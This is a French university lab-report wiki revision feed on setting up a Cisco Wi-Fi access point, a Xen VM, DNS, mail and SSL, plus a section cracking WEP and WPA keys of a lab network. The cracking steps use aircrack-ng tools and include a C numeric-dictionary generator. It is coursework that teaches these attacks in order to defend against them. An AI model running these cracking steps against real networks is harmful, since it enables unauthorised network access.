   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23124</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23124"/>
				<updated>2015-11-22T17:19:44Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation des systèmes d'exploitation &amp;lt;/h2&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Services Internet &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Serveur DNS&amp;lt;/h4&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Recuperation du certificat SSL&amp;lt;/h4&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
